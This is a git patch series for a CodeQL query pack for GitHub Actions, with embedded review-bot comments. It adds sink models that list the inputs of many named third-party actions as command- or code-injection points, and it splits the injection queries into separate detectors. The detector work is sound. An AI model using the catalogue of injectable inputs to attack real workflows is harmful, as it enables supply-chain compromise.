index 00000000000..e2813105bdc
--- /dev/null
+++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"]
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index 0190ffd9ad7..d6ba27a5079 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 87610c43440..413f4f3058b 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
new file mode 100644
index 00000000000..42361b203e0
--- /dev/null
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
new file mode 100644
index 00000000000..474b36186b0
--- /dev/null
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["snow-actions/eclint", "*", "input.args", "command-injection"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
new file mode 100644
index 00000000000..73b93dbb88a
--- /dev/null
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -0,0 +1,10 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.command", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.args", "command-injection"]
+ - ["stackhawk/hawkscan-action", "*", "input.version", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
new file mode 100644
index 00000000000..4138b97f0fb
--- /dev/null
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
new file mode 100644
index 00000000000..1bcbac476a8
--- /dev/null
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tibdex/backport", "*", "input.body_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.head_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.labels_template", "code-injection"]
+ - ["tibdex/backport", "*", "input.title_template", "code-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 21a0b479ef5..7c681d8a64b 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -19,4 +19,4 @@ extensions:
 - ["tj-actions/changed-files", "*", "output.other_modified_files", "pull_request_target", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.other_deleted_files", "pull_request_target", "PR changed files"]
 - ["tj-actions/changed-files", "*", "output.modified_keys", "pull_request_target", "PR changed files"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
new file mode 100644
index 00000000000..3072c6f54fd
--- /dev/null
+++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml
@@ -0,0 +1,15 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-user-email", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-url", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.github-token", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-pull-method", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.fallback-version", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-message", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.git-branch", "command-injection"]
+ - ["tripss/conventional-changelog-action", "*", "input.tag-prefix'", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
new file mode 100644
index 00000000000..5fe53ea3d07
--- /dev/null
+++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection"]
+ - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection"]
diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml
new file mode 100644
index 00000000000..5e87f6c3b94
--- /dev/null
+++ b/ql/lib/ext/veracode_veracode-sca.model.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.path", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.skip-collectors", "command-injection"]
+ - ["veracode/veracode-sca", "*", "input.url", "command-injection"]
diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml
new file mode 100644
index 00000000000..dbe5d2d542d
--- /dev/null
+++ b/ql/lib/ext/wearerequired_lint-action.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["wearerequired/lint-action", "*", "input.git_name", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.git_email", "command-injection"]
+ - ["wearerequired/lint-action", "*", "input.commit_message", "command-injection"]
diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml
new file mode 100644
index 00000000000..9ecbdb6329f
--- /dev/null
+++ b/ql/lib/ext/webfactory_ssh-agent.model.yml
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection"]
+ - ["webfactory/ssh-agent", "*", "input.git-cmd", "command-injection"]
diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml
new file mode 100644
index 00000000000..10920eb6bf5
--- /dev/null
+++ b/ql/lib/ext/zaproxy_action-baseline.model.yml
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.target", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-baseline", "*", "input.cmd_options", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml new file mode 100644 index 00000000000..a1d49af0845 --- /dev/null +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.target", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.rules_file_name", "command-injection"] + - ["zaproxy/action-full-scan", "*", "input.cmd_options", "command-injection"] diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 1e7414e5ce6..9e94968e280 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -21,7 +21,8 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, "expression-injection") + externallyDefinedSink(this, + ["expression-injection", "command-injection", "request-forgery", "code-injection"]) } } From d21d453d1ccf9039b98df6adf0d6948dddf23743 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 16:30:23 +0100 Subject: [PATCH 0118/1267] Split queries --- ql/src/Security/CWE-078/CommandInjection.ql | 38 +++++++++++++++ .../CWE-078/CriticalCommandInjection.ql | 44 ++++++++++++++++++ ql/src/Security/CWE-094/CodeInjection.ql | 40 ++++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.ql | 46 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 +- ql/src/Security/CWE-918/RequestForgery.ql | 37 +++++++++++++++ 6 files changed, 206 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-078/CommandInjection.ql create mode 100644 ql/src/Security/CWE-078/CriticalCommandInjection.ql create mode 100644 ql/src/Security/CWE-094/CodeInjection.ql create mode 100644 ql/src/Security/CWE-094/CriticalCodeInjection.ql create mode 100644 ql/src/Security/CWE-918/RequestForgery.ql diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql new file mode 100644 index 00000000000..2a2225e17b6 --- /dev/null +++ b/ql/src/Security/CWE-078/CommandInjection.ql 
@@ -0,0 +1,38 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
new file mode 100644
index 00000000000..3834b0ac0d0
--- /dev/null
+++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql
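Review bot: The `where` clause here accepts every `MyFlow::flowPath(source, sink)`, so each path that CriticalCommandInjection.ql reports (the same flow, restricted to reusable workflows or a matching trigger event) is also reported by this query at warning severity. Unless the double alert is intended, exclude the critical case from this query, as sketched below. The CodeInjection.ql / CriticalCodeInjection.ql pair added in this commit has the same overlap.

```ql
from MyFlow::PathNode source, MyFlow::PathNode sink
where
  MyFlow::flowPath(source, sink) and
  // leave flows that the critical query reports to that query
  not exists(Workflow w |
    w = source.getNode().asExpr().getEnclosingWorkflow() and
    (
      w instanceof ReusableWorkflow or
      w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
    )
  )
// … unchanged: select clause …
```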
@@ -0,0 +1,44 @@
+/**
+ * @name Command built from user-controlled sources
+ * @description Building a system command from user-controlled sources is vulnerable to insertion of
+ * malicious code by the user.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/command-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-078
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CommandInjectionSink extends DataFlow::Node {
+ CommandInjectionSink() { externallyDefinedSink(this, "command-injection") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CommandInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql
new file mode 100644
index 00000000000..7ad0e98bc49
--- /dev/null
+++ b/ql/src/Security/CWE-094/CodeInjection.ql
@@ -0,0 +1,40 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 5.0
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
new file mode 100644
index 00000000000..5a4bbaca034
--- /dev/null
+++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql
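Review bot: `CodeInjectionSink` is bound to the wrong model kind: `externallyDefinedSink(this, "request-forgery")` makes this query report the request-forgery sinks (which RequestForgery.ql in this commit also reports) and ignore the rows modelled as `"code-injection"` earlier in the series (roots/issue-closer-action, tibdex/backport, skitionek/notify-microsoft-teams). The characteristic predicate should read `CodeInjectionSink() { externallyDefinedSink(this, "code-injection") }`. CriticalCodeInjection.ql has the same line and needs the same change. Because this commit also drops those kinds from ExpressionInjection.ql, none of the queries shown here would otherwise consume the code-injection models.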
@@ -0,0 +1,46 @@
+/**
+ * @name Code injection
+ * @description Interpreting unsanitized user input as code allows a malicious user to perform arbitrary
+ * code execution.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 9
+ * @precision high
+ * @id actions/code-injection
+ * @tags actions
+ * security
+ * external/cwe/cwe-094
+ * external/cwe/cwe-095
+ * external/cwe/cwe-116
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class CodeInjectionSink extends DataFlow::Node {
+ CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink, Workflow w
+where
+ MyFlow::flowPath(source, sink) and
+ w = source.getNode().asExpr().getEnclosingWorkflow() and
+ (
+ w instanceof ReusableWorkflow or
+ w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent())
+ )
+select sink.getNode(), source, sink,
+ "Potential expression injection in $@, which may be controlled by an external user.", sink,
+ sink.getNode().asExpr().(Expression).getRawExpression()
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 9e94968e280..1e7414e5ce6 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -21,8 +21,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { exists(Run e | e.getAnScriptExpr() = this.asExpr()) or - externallyDefinedSink(this, - ["expression-injection", "command-injection", "request-forgery", "code-injection"]) + externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql new file mode 100644 index 00000000000..3675597fcd7 --- /dev/null +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -0,0 +1,37 @@ +/** + * @name Uncontrolled data used in network request + * @description Sending network requests with user-controlled data allows for request forgery attacks. + * @kind path-problem + * @problem.severity error + * @security-severity 9.1 + * @precision high + * @id actions/request-forgery + * @tags actions + * security + * external/cwe/cwe-918 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class RequestForgerySink extends DataFlow::Node { + RequestForgerySink() { externallyDefinedSink(this, "request-forgery") } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof RequestForgerySink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential expression injection in $@, which may be controlled by an external user.", sink, + sink.getNode().asExpr().(Expression).getRawExpression() From f251783c26bb89fdf785de543ec08ce09ef55c26 Mon Sep 17 00:00:00 2001 
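Review bot: The `select` message in the new RequestForgery.ql says "Potential expression injection" although the query is `actions/request-forgery` tagged CWE-918, so the alert names the wrong weakness class and points triage at the wrong remediation. Use `"Potential request forgery in $@, which may be controlled by an external user."`. The query is also rated `@security-severity 9.1` for every `RemoteFlowSource` path, without the workflow-trigger condition that the critical code-injection query applies; if that is intentional, a sentence in the header comment saying so would settle the question for reviewers.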
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 17:47:20 +0100 Subject: [PATCH 0119/1267] Apply suggestions from code review Co-authored-by: Jorge <46056498+jorgectf@users.noreply.github.com> --- ql/src/Security/CWE-078/CommandInjection.ql | 2 +- ql/src/Security/CWE-078/CriticalCommandInjection.ql | 4 ++-- ql/src/Security/CWE-094/CodeInjection.ql | 4 ++-- ql/src/Security/CWE-094/CriticalCodeInjection.ql | 6 +++--- ql/src/Security/CWE-918/RequestForgery.ql | 2 +- 5 files changed, 9 insertions(+), 9 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 2a2225e17b6..9891f786f7c 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -34,5 +34,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-078/CriticalCommandInjection.ql b/ql/src/Security/CWE-078/CriticalCommandInjection.ql index 3834b0ac0d0..5d418ec1816 100644 --- a/ql/src/Security/CWE-078/CriticalCommandInjection.ql +++ b/ql/src/Security/CWE-078/CriticalCommandInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/command-injection + * @id actions/critical-command-injection * @tags actions * security * external/cwe/cwe-078 
@@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc49..bc2dbffdcdf 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034..2a1e4388d24 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 
@@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd7..d665a368991 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 46afa9c1f3fc771e0430dd2d0101035d2e208048 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 14 Mar 2024 22:41:01 +0100 Subject: [PATCH 0120/1267] Add new tests --- ql/lib/codeql/actions/dataflow/ExternalFlow.qll | 6 +++--- ql/src/Security/CWE-078/CommandInjection.ql | 1 + .../Security/CWE-078/CriticalCommandInjection.ql | 1 + ql/src/Security/CWE-094/CodeInjection.ql | 1 + ql/src/Security/CWE-094/CriticalCodeInjection.ql | 1 + ql/src/Security/CWE-918/RequestForgery.ql | 1 + ql/test/library-tests/test.expected | 3 +++ .../CWE-078/.github/workflows/comment_issue.yml | 9 +++++++++ .../Security/CWE-078/CommandInjection.expected | 6 ++++++ .../Security/CWE-078/CommandInjection.qlref | 1 + .../CWE-078/CriticalCommandInjection.expected | 6 ++++++ .../CWE-078/CriticalCommandInjection.qlref | 1 + .../Security/CWE-094/CodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CodeInjection.qlref | 1 + .../CWE-094/CriticalCodeInjection.expected | 14 ++++++++++++++ .../Security/CWE-094/CriticalCodeInjection.qlref | 1 + .../CWE-094/CriticalExpressionInjection.expected | 10 ---------- .../Security/CWE-094/ExpressionInjection.expected | 10 ---------- .../Security/CWE-918/.github/workflows/test.yml | 10 ++++++++++ .../Security/CWE-918/RequestForgery.expected | 6 ++++++ .../Security/CWE-918/RequestForgery.qlref | 1 + 21 files changed, 81 insertions(+), 23 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/comment_issue.yml create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-078/CriticalCommandInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CodeInjection.qlref create mode 100644 
ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-094/CriticalCodeInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-918/.github/workflows/test.yml create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.expected create mode 100644 ql/test/query-tests/Security/CWE-918/RequestForgery.qlref diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 7e265fb2570..08f8b6b9363 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -86,8 +86,10 @@ predicate externallyDefinedStoreStep( ) } -predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { +predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | + sinkModel(action, version, input, kind) and + uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") then sink.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) @@ -96,8 +98,6 @@ predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { then sink.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) else none() ) and - sinkModel(action, version, input, kind) and - uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" then uses.getVersion() = any(string v) diff --git a/ql/src/Security/CWE-078/CommandInjection.ql b/ql/src/Security/CWE-078/CommandInjection.ql index 9891f786f7c..bdc341e8caf 100644 --- a/ql/src/Security/CWE-078/CommandInjection.ql +++ b/ql/src/Security/CWE-078/CommandInjection.ql @@ -13,6 +13,7 @@ */ import actions +import codeql.actions.DataFlow import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow 
